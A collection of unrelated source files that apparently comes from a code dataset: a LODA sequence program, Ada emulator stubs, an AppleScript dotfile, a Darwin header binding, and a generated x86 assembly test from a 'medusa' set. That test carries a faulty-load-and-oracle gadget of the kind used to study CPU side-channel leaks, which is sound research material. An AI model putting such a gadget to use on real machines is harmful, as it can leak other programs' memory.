<filename>programs/oeis/226/A226164.asm ; A226164: Sequence used for the quadratic irrational number belonging to the principal indefinite binary quadratic form. ; 1,2,2,3,3,4,3,4,4,5,4,5,5,6,5,6,5,6,6,7,6,7,6,7,7,8,7,8,7,8,7,8,8,9,8,9,8,9,8,9,9,10,9,10,9,10,9,10,9,10,10,11,10,11,10,11,10,11,10,11,11,12,11,12,11,12,11,12,11,12,11,12,12,13,12,13,12,13,12,13,12 mov $2,$0 mov $4,$0 mov $5,$0 gcd $5,2 lpb $2,1 add $3,$0 mul $4,2 lpb $4,1 sub $4,$5 add $5,1 trn $4,$5 add $7,2 lpe lpb $5,1 mov $0,3 sub $5,$5 add $6,$3 lpe lpb $6,1 mov $0,$7 mov $6,1 lpe add $6,4 cmp $2,$6 lpe mov $1,$0 div $1,2 add $1,1

Ada/src/instruction.adb

herrBez/MOS6502-Emulator

3

28646

package body Instruction is function Initialize_Instruction_Table return Fun_Array is Instruction_Table : Fun_Array(0..255) := (others => Not_Yet_Supported_Operation'Access); begin Instruction_Table(16#EA#) := NOP'Access; return Instruction_Table; end Initialize_Instruction_Table; procedure Not_Yet_Supported_Operation(This : in out MOS_T) is begin Put("Operation"); Put_Hex(Integer(This.Mem(This.PC))); Put("Not Supported"); New_Line; end Not_Yet_Supported_Operation; -------------------------------------------------------------------- -- ADC FUNCTIONS -- Add memory to accumulator with carry -------------------------------------------------------------------- procedure ADC_Immediate (This : in out MOS_T) is begin null; end; procedure ADC_Absolute (This : in out MOS_T) is begin null; end; procedure ADC_Zero_Page (This : in out MOS_T) is begin null; end; procedure ADC_Absolute_X (This : in out MOS_T) is begin null; end; procedure ADC_Absolute_Y (This : in out MOS_T) is begin null; end; procedure ADC_Zero_Page_X_Indexed_Indirect (This : in out MOS_T) is begin null; end; procedure ADC_Zero_Page_Y_Indirect_Indexed (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- AND FUNCTIONS: -- "AND" memory with accumulator -------------------------------------------------------------------- procedure AND_Immediate (This : in out MOS_T) is begin null; end; procedure AND_Absolute (This : in out MOS_T) is begin null; end; procedure AND_Zero_Page (This : in out MOS_T) is begin null; end; procedure AND_Absolute_X (This : in out MOS_T) is begin null; end; procedure AND_Absolute_Y (This : in out MOS_T) is begin null; end; procedure AND_Zero_Page_X_Indexed_Indirect (This : in out MOS_T) is begin null; end; procedure AND_Zero_Page_Y_Indirect_Indexed (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- ASL: -- Shift left one bit (Memory or Accumulator) -------------------------------------------------------------------- procedure ASL_Accumulator (This : in out MOS_T) is begin null; end; procedure ASL_Zero_Page (This : in out MOS_T) is begin null; end; procedure ASL_Zero_Page_X (This : in out MOS_T) is begin null; end; procedure ASL_Absolute (This : in out MOS_T) is begin null; end; procedure ASL_Absolute_X (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- BCC: -- Branch on carry clear -------------------------------------------------------------------- procedure BCC (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- BCS: -- Branch on carry set -------------------------------------------------------------------- procedure BCS (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- BEQ: -- Branch on result zero -------------------------------------------------------------------- procedure BEQ (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- BIT: -- Test bits in memory with accumulator -------------------------------------------------------------------- procedure BIT (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- BMI: -- Branch on result minus -------------------------------------------------------------------- procedure BMI (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- BNE -- Branch on result not zero -------------------------------------------------------------------- procedure BNE (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- BPL -- Branch on result plus -------------------------------------------------------------------- procedure BPL (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- BRK -- Force Break -------------------------------------------------------------------- procedure BRK (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- BVC -- Branch on overflow clear -------------------------------------------------------------------- procedure BVC (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- BVS -- Branch on overflow set -------------------------------------------------------------------- procedure BVS (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- CLC -- Clear carry flag -------------------------------------------------------------------- procedure CLC (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- CLC -- Clear decimal mode -------------------------------------------------------------------- procedure CLD (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- CLI -- Clear interrupt disable status -------------------------------------------------------------------- procedure CLI (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- CLV -- Clear overflow flag -------------------------------------------------------------------- procedure CLV (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- CMP FUNCTIONS -- Compare memory and accumulator -------------------------------------------------------------------- procedure CMP_Immediate (This : in out MOS_T) is begin null; end; procedure CMP_Absolute (This : in out MOS_T) is begin null; end; procedure CMP_Zero_Page (This : in out MOS_T) is begin null; end; procedure CMP_Absolute_X (This : in out MOS_T) is begin null; end; procedure CMP_Absolute_Y (This : in out MOS_T) is begin null; end; procedure CMP_Zero_Page_X_Indexed_Indirect (This : in out MOS_T) is begin null; end; procedure CMP_Zero_Page_Y_Indirect_Indexed (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- CPX FUNCTIONS -- Compare memory and index X -------------------------------------------------------------------- procedure CPX_Immediate (This : in out MOS_T) is begin null; end; procedure CPX_Absolute (This : in out MOS_T) is begin null; end; procedure CPX_Zero_Page (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- CPY FUNCTIONS -- Compare memory and index Y -------------------------------------------------------------------- procedure CPY_Immediate (This : in out MOS_T) is begin null; end; procedure CPY_Absolute (This : in out MOS_T) is begin null; end; procedure CPY_Zero_Page (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- DEC -- Decrement memory by one -------------------------------------------------------------------- procedure DEC_Zero_Page (This : in out MOS_T) is begin null; end; procedure DEC_Zero_Page_X (This : in out MOS_T) is begin null; end; procedure DEC_Absolute (This : in out MOS_T) is begin null; end; procedure DEC_Absolute_X (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- DEX -- Decrement index X by one -------------------------------------------------------------------- procedure DEX (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- DEY -- Decrement index X by one -------------------------------------------------------------------- procedure DEY (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- EOR FUNCTIONS -- Exclusive-OR memory and accumulator -------------------------------------------------------------------- procedure EOR_Immediate (This : in out MOS_T) is begin null; end; procedure EOR_Absolute (This : in out MOS_T) is begin null; end; procedure EOR_Zero_Page (This : in out MOS_T) is begin null; end; procedure EOR_Absolute_X (This : in out MOS_T) is begin null; end; procedure EOR_Absolute_Y (This : in out MOS_T) is begin null; end; procedure EOR_Zero_Page_X_Indexed_Indirect (This : in out MOS_T) is begin null; end; procedure EOR_Zero_Page_Y_Indirect_Indexed (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- INC -- Increment memory by one -------------------------------------------------------------------- procedure INC_Zero_Page (This : in out MOS_T) is begin null; end; procedure INC_Zero_Page_X (This : in out MOS_T) is begin null; end; procedure INC_Absolute (This : in out MOS_T) is begin null; end; procedure INC_Absolute_X (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- INX -- Increment index X by one -------------------------------------------------------------------- procedure INX (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- INY -- Increment index X by one -------------------------------------------------------------------- procedure INY (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- JMP -- Jump to new location -------------------------------------------------------------------- procedure JMP_Absolute (This : in out MOS_T) is begin null; end; procedure JMP_Absolute_Indirect (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- JSR -- Jump to new location saving return address -------------------------------------------------------------------- procedure JSR_Absolute (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- LDA -- Load accumulator with memory -------------------------------------------------------------------- procedure LDA_Immediate (This : in out MOS_T) is begin null; end; procedure LDA_Absolute (This : in out MOS_T) is begin null; end; procedure LDA_Zero_Page (This : in out MOS_T) is begin null; end; procedure LDA_Absolute_X (This : in out MOS_T) is begin null; end; procedure LDA_Absolute_Y (This : in out MOS_T) is begin null; end; procedure LDA_Zero_Page_X_Indexed_Indirect (This : in out MOS_T) is begin null; end; procedure LDA_Zero_Page_Y_Indirect_Indexed (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- LDX -- Load index X with memory -------------------------------------------------------------------- procedure LDX_Immediate (This : in out MOS_T) is begin null; end; procedure LDX_Zero_Page (This : in out MOS_T) is begin null; end; procedure LDX_Zero_Page_Y (This : in out MOS_T) is begin null; end; procedure LDX_Zero_Page_Absolute (This : in out MOS_T) is begin null; end; procedure LDX_Zero_Page_Absolute_Y (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- LDY -- Load index Y with memory -------------------------------------------------------------------- procedure LDY_Immediate (This : in out MOS_T) is begin null; end; procedure LDY_Zero_Page (This : in out MOS_T) is begin null; end; procedure LDY_Zero_Page_Y (This : in out MOS_T) is begin null; end; procedure LDY_Zero_Page_Absolute (This : in out MOS_T) is begin null; end; procedure LDY_Zero_Page_Absolute_Y (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- LSR -- Shift right one bit (memory or accumulator) -------------------------------------------------------------------- procedure LSR_Accumulator (This : in out MOS_T) is begin null; end; procedure LSR_Zero_Page (This : in out MOS_T) is begin null; end; procedure LSR_Zero_Page_X (This : in out MOS_T) is begin null; end; procedure LSR_Absolute (This : in out MOS_T) is begin null; end; procedure LSR_Absolute_X (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- NOP -- No operation -------------------------------------------------------------------- procedure NOP (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- OR FUNCTIONS: -- "OR" memory with accumulator -------------------------------------------------------------------- procedure OR_Immediate (This : in out MOS_T) is begin null; end; procedure OR_Absolute (This : in out MOS_T) is begin null; end; procedure OR_Zero_Page (This : in out MOS_T) is begin null; end; procedure OR_Absolute_X (This : in out MOS_T) is begin null; end; procedure OR_Absolute_Y (This : in out MOS_T) is begin null; end; procedure OR_Zero_Page_X_Indexed_Indirect (This : in out MOS_T) is begin null; end; procedure OR_Zero_Page_Y_Indirect_Indexed (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- PHA -- Push accumulator on stack -------------------------------------------------------------------- procedure PHA (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- PHP -- Push processor status on stack -------------------------------------------------------------------- procedure PHP (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- PLA -- Pull accumulator from stack -------------------------------------------------------------------- procedure PLA (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- PLP -- Pull accumulator from stack -------------------------------------------------------------------- procedure PLP (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- ROL -- Rotate one bit left (memory or accumulator) -------------------------------------------------------------------- procedure ROL_Accumulator (This : in out MOS_T) is begin null; end; procedure ROL_Zero_Page (This : in out MOS_T) is begin null; end; procedure ROL_Zero_Page_X (This : in out MOS_T) is begin null; end; procedure ROL_Absolute (This : in out MOS_T) is begin null; end; procedure ROL_Absolute_X (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- ROR -- Rotate one bit right (memory or accumulator) -------------------------------------------------------------------- procedure ROR_Accumulator (This : in out MOS_T) is begin null; end; procedure ROR_Zero_Page (This : in out MOS_T) is begin null; end; procedure ROR_Zero_Page_X (This : in out MOS_T) is begin null; end; procedure ROR_Absolute (This : in out MOS_T) is begin null; end; procedure ROR_Absolute_X (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- RTI: -- return from interrupt -------------------------------------------------------------------- procedure RTI (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- RTS: -- return from subroutine -------------------------------------------------------------------- procedure RTS (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- SBC: -- Subtract memory from accumulator with borrow -------------------------------------------------------------------- procedure SBC_Immediate (This : in out MOS_T) is begin null; end; procedure SBC_Absolute (This : in out MOS_T) is begin null; end; procedure SBC_Zero_Page (This : in out MOS_T) is begin null; end; procedure SBC_Absolute_X (This : in out MOS_T) is begin null; end; procedure SBC_Absolute_Y (This : in out MOS_T) is begin null; end; procedure SBC_Zero_Page_X_Indexed_Indirect (This : in out MOS_T) is begin null; end; procedure SBC_Zero_Page_Y_Indirect_Indexed (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- SEC -- Set carry flag -------------------------------------------------------------------- procedure SEC (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- SED -- Set decimal mode -------------------------------------------------------------------- procedure SED (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- SEI -- Set interrupt disable status -------------------------------------------------------------------- procedure SEI (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- STA: -- Stone accumulator in memory -------------------------------------------------------------------- procedure STA_Immediate (This : in out MOS_T) is begin null; end; procedure STA_Absolute (This : in out MOS_T) is begin null; end; procedure STA_Zero_Page (This : in out MOS_T) is begin null; end; procedure STA_Absolute_X (This : in out MOS_T) is begin null; end; procedure STA_Absolute_Y (This : in out MOS_T) is begin null; end; procedure STA_Zero_Page_X_Indexed_Indirect (This : in out MOS_T) is begin null; end; procedure STA_Zero_Page_Y_Indirect_Indexed (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- STX -- Store index X in memory -------------------------------------------------------------------- procedure STX_Zero_Page (This : in out MOS_T) is begin null; end; procedure STX_Zero_Page_Y (This : in out MOS_T) is begin null; end; procedure STX_Absolute (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- STY -- Store index Y in memory -------------------------------------------------------------------- procedure STY_Zero_Page (This : in out MOS_T) is begin null; end; procedure STY_Zero_Page_Y (This : in out MOS_T) is begin null; end; procedure STY_Absolute (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- TAX -- Transfer accumulator to index X -------------------------------------------------------------------- procedure TAX (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- TAY -- Transfer accumulator to index Y -------------------------------------------------------------------- procedure TAY (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- TSX -- Transfer stack pointer to index X -------------------------------------------------------------------- procedure TSX (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- TXA -- Transfer index X to accumulator -------------------------------------------------------------------- procedure TXA (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- TXS -- Transfer index X to stack pointer -------------------------------------------------------------------- procedure TXS (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- TYA -- Transfer index Y to accumulator -------------------------------------------------------------------- procedure TYA (This : in out MOS_T) is begin null; end; end Instruction;

mac/appearance.scpt

dhruvmanila/dotfiles

10

1240

<reponame>dhruvmanila/dotfiles tell application "System Events" tell appearance preferences -- (bool) Use dark mode for bar and dock. set dark mode to true -- Color used for highlighting selected text and lists. -- Available: blue gold graphite green orange purple red silver set highlight color to graphite end tell end tell

Virtual Memory Implementation/Theme_B_9/GeekOS (os)/src/geekos/PaxHeader/symbol.asm

Pintulalmeena/Projects

0

168313

<reponame>Pintulalmeena/Projects 14 uid=311598 27 mtime=1430738578.059251 27 atime=1430738578.058251

Transynther/x86/_processed/AVXALIGN/_zr_/i7-7700_9_0xca_notsx.log_68_1336.asm

ljhsiun2/medusa

9

166256

<gh_stars>1-10 .global s_prepare_buffers s_prepare_buffers: push %r11 push %r12 push %r9 push %rax push %rcx push %rdi push %rdx push %rsi lea addresses_normal_ht+0x171a7, %rsi lea addresses_A_ht+0x8227, %rdi nop add $46154, %rax mov $107, %rcx rep movsw add $27075, %rcx lea addresses_UC_ht+0xb827, %r12 nop and $28077, %rsi movl $0x61626364, (%r12) nop sub $40511, %rax lea addresses_D_ht+0x11a27, %r12 nop cmp %r9, %r9 vmovups (%r12), %ymm7 vextracti128 $1, %ymm7, %xmm7 vpextrq $1, %xmm7, %rdi nop nop nop nop nop sub $17320, %r9 lea addresses_A_ht+0x337, %rdi dec %r12 mov (%rdi), %cx nop nop nop nop add %rax, %rax lea addresses_WC_ht+0xc127, %rdx nop nop sub %r12, %r12 mov (%rdx), %ax nop nop add $11983, %rcx lea addresses_normal_ht+0x10227, %rsi nop nop nop sub $30343, %rcx movb (%rsi), %r12b nop nop nop nop and %rax, %rax lea addresses_D_ht+0x18da7, %rsi lea addresses_WC_ht+0x7a17, %rdi and $23898, %r11 mov $49, %rcx rep movsq nop nop add $8538, %r11 lea addresses_A_ht+0x1eb87, %rsi lea addresses_A_ht+0x68b7, %rdi clflush (%rdi) nop nop nop sub $11994, %r12 mov $8, %rcx rep movsl nop nop nop and %rsi, %rsi lea addresses_normal_ht+0x1a27, %rdi nop nop nop nop nop add %rsi, %rsi movl $0x61626364, (%rdi) nop nop inc %r11 lea addresses_normal_ht+0x1e627, %rcx nop nop nop nop mfence movw $0x6162, (%rcx) nop nop nop nop nop add $47634, %rsi lea addresses_normal_ht+0x16627, %r11 nop nop sub $27924, %rdx mov (%r11), %si nop nop nop nop add $51101, %r11 lea addresses_D_ht+0xeb03, %rdx nop nop nop nop nop xor $8473, %rax movb $0x61, (%rdx) nop nop nop nop xor $24216, %rax lea addresses_WT_ht+0x17a27, %rsi lea addresses_D_ht+0x3750, %rdi cmp $5419, %r9 mov $115, %rcx rep movsq sub %rdx, %rdx lea addresses_WT_ht+0x11a27, %rsi lea addresses_normal_ht+0x1efa7, %rdi clflush (%rdi) nop sub $24948, %rax mov $62, %rcx rep movsl nop nop nop nop cmp $26694, %r9 pop %rsi pop %rdx pop %rdi pop %rcx pop %rax pop %r9 pop %r12 pop %r11 ret .global s_faulty_load s_faulty_load: push %r10 push %r12 push %r15 push %r8 push %rbp push %rbx push %rdi // Store lea addresses_WT+0x134a7, %r8 nop nop dec %rdi mov $0x5152535455565758, %r12 movq %r12, %xmm0 movups %xmm0, (%r8) nop nop nop nop cmp $34155, %r12 // Faulty Load mov $0xa27, %rbx nop nop nop nop nop sub $17451, %r10 mov (%rbx), %r12d lea oracles, %r8 and $0xff, %r12 shlq $12, %r12 mov (%r8,%r12,1), %r12 pop %rdi pop %rbx pop %rbp pop %r8 pop %r15 pop %r12 pop %r10 ret /* <gen_faulty_load> [REF] {'src': {'NT': False, 'AVXalign': False, 'size': 32, 'congruent': 0, 'same': False, 'type': 'addresses_P'}, 'OP': 'LOAD'} {'dst': {'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 0, 'same': False, 'type': 'addresses_WT'}, 'OP': 'STOR'} [Faulty Load] {'src': {'NT': False, 'AVXalign': True, 'size': 4, 'congruent': 0, 'same': True, 'type': 'addresses_P'}, 'OP': 'LOAD'} <gen_prepare_buffer> {'src': {'congruent': 4, 'same': False, 'type': 'addresses_normal_ht'}, 'dst': {'congruent': 10, 'same': False, 'type': 'addresses_A_ht'}, 'OP': 'REPM'} {'dst': {'NT': False, 'AVXalign': False, 'size': 4, 'congruent': 9, 'same': False, 'type': 'addresses_UC_ht'}, 'OP': 'STOR'} {'src': {'NT': False, 'AVXalign': False, 'size': 32, 'congruent': 10, 'same': False, 'type': 'addresses_D_ht'}, 'OP': 'LOAD'} {'src': {'NT': True, 'AVXalign': False, 'size': 2, 'congruent': 3, 'same': False, 'type': 'addresses_A_ht'}, 'OP': 'LOAD'} {'src': {'NT': False, 'AVXalign': False, 'size': 2, 'congruent': 6, 'same': False, 'type': 'addresses_WC_ht'}, 'OP': 'LOAD'} {'src': {'NT': False, 'AVXalign': False, 'size': 1, 'congruent': 10, 'same': False, 'type': 'addresses_normal_ht'}, 'OP': 'LOAD'} {'src': {'congruent': 0, 'same': False, 'type': 'addresses_D_ht'}, 'dst': {'congruent': 4, 'same': False, 'type': 'addresses_WC_ht'}, 'OP': 'REPM'} {'src': {'congruent': 4, 'same': False, 'type': 'addresses_A_ht'}, 'dst': {'congruent': 3, 'same': False, 'type': 'addresses_A_ht'}, 'OP': 'REPM'} {'dst': {'NT': False, 'AVXalign': True, 'size': 4, 'congruent': 9, 'same': False, 'type': 'addresses_normal_ht'}, 'OP': 'STOR'} {'dst': {'NT': True, 'AVXalign': False, 'size': 2, 'congruent': 10, 'same': False, 'type': 'addresses_normal_ht'}, 'OP': 'STOR'} {'src': {'NT': False, 'AVXalign': False, 'size': 2, 'congruent': 10, 'same': False, 'type': 'addresses_normal_ht'}, 'OP': 'LOAD'} {'dst': {'NT': False, 'AVXalign': False, 'size': 1, 'congruent': 2, 'same': False, 'type': 'addresses_D_ht'}, 'OP': 'STOR'} {'src': {'congruent': 11, 'same': False, 'type': 'addresses_WT_ht'}, 'dst': {'congruent': 0, 'same': False, 'type': 'addresses_D_ht'}, 'OP': 'REPM'} {'src': {'congruent': 7, 'same': False, 'type': 'addresses_WT_ht'}, 'dst': {'congruent': 5, 'same': False, 'type': 'addresses_normal_ht'}, 'OP': 'REPM'} {'00': 68} 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 */

src/generated/runetype_h.ads

csb6/libtcod-ada

0

17240

<gh_stars>0 pragma Ada_2012; pragma Style_Checks (Off); with Interfaces.C; use Interfaces.C; with i386_utypes_h; with Interfaces.C.Strings; with System; package runetype_h is --- -- * Copyright (c) 1993 -- * The Regents of the University of California. All rights reserved. -- * -- * This code is derived from software contributed to Berkeley by -- * <NAME> at Krystal Technologies. -- * -- * Redistribution and use in source and binary forms, with or without -- * modification, are permitted provided that the following conditions -- * are met: -- * 1. Redistributions of source code must retain the above copyright -- * notice, this list of conditions and the following disclaimer. -- * 2. Redistributions in binary form must reproduce the above copyright -- * notice, this list of conditions and the following disclaimer in the -- * documentation and/or other materials provided with the distribution. -- * 3. All advertising materials mentioning features or use of this software -- * must display the following acknowledgement: -- * This product includes software developed by the University of -- * California, Berkeley and its contributors. -- * 4. Neither the name of the University nor the names of its contributors -- * may be used to endorse or promote products derived from this software -- * without specific prior written permission. -- * -- * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND -- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE -- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE -- * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE -- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL -- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS -- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) -- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT -- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY -- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF -- * SUCH DAMAGE. -- * -- * @(#)runetype.h 8.1 (Berkeley) 6/2/93 -- -- * The lower 8 bits of runetype[] contain the digit value of the rune. -- -- First rune of the range -- Last rune (inclusive) of the range -- What first maps to in maps -- Array of types in range type u_RuneEntry is record uu_min : aliased i386_utypes_h.uu_darwin_rune_t; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:61 uu_max : aliased i386_utypes_h.uu_darwin_rune_t; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:62 uu_map : aliased i386_utypes_h.uu_darwin_rune_t; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:63 uu_types : access i386_utypes_h.uu_uint32_t; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:64 end record with Convention => C_Pass_By_Copy; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:65 -- Number of ranges stored -- Pointer to the ranges type u_RuneRange is record uu_nranges : aliased int; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:68 uu_ranges : access u_RuneEntry; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:69 end record with Convention => C_Pass_By_Copy; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:70 -- CHARCLASS_NAME_MAX = 14 -- charclass mask subtype u_RuneCharClass_array1132 is Interfaces.C.char_array (0 .. 13); type u_RuneCharClass is record uu_name : aliased u_RuneCharClass_array1132; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:73 uu_mask : aliased i386_utypes_h.uu_uint32_t; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:74 end record with Convention => C_Pass_By_Copy; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:75 -- Magic saying what version we are -- ASCII name of this encoding -- * The following are to deal with Runes larger than _CACHED_RUNES - 1. -- * Their data is actually contiguous with this structure so as to make -- * it easier to read/write from/to disk. -- -- Data which depends on the encoding -- how long that data is -- * extra fields to deal with arbitrary character classes -- subtype u_RuneLocale_array828 is Interfaces.C.char_array (0 .. 7); subtype u_RuneLocale_array1136 is Interfaces.C.char_array (0 .. 31); type u_RuneLocale_array1147 is array (0 .. 255) of aliased i386_utypes_h.uu_uint32_t; type u_RuneLocale_array1149 is array (0 .. 255) of aliased i386_utypes_h.uu_darwin_rune_t; type u_RuneLocale is record uu_magic : aliased u_RuneLocale_array828; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:78 uu_encoding : aliased u_RuneLocale_array1136; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:79 uu_sgetrune : access function (arg1 : Interfaces.C.Strings.chars_ptr; arg2 : i386_utypes_h.uu_darwin_size_t; arg3 : System.Address) return i386_utypes_h.uu_darwin_rune_t; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:81 uu_sputrune : access function (arg1 : i386_utypes_h.uu_darwin_rune_t; arg2 : Interfaces.C.Strings.chars_ptr; arg3 : i386_utypes_h.uu_darwin_size_t; arg4 : System.Address) return int; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:82 uu_invalid_rune : aliased i386_utypes_h.uu_darwin_rune_t; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:83 uu_runetype : aliased u_RuneLocale_array1147; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:85 uu_maplower : aliased u_RuneLocale_array1149; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:86 uu_mapupper : aliased u_RuneLocale_array1149; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:87 uu_runetype_ext : aliased u_RuneRange; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:94 uu_maplower_ext : aliased u_RuneRange; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:95 uu_mapupper_ext : aliased u_RuneRange; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:96 uu_variable : System.Address; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:98 uu_variable_len : aliased int; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:99 uu_ncharclasses : aliased int; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:104 uu_charclasses : access u_RuneCharClass; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:105 end record with Convention => C_Pass_By_Copy; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:106 end runetype_h;

programs/oeis/051/A051960.asm

jmorken/loda

1

80649

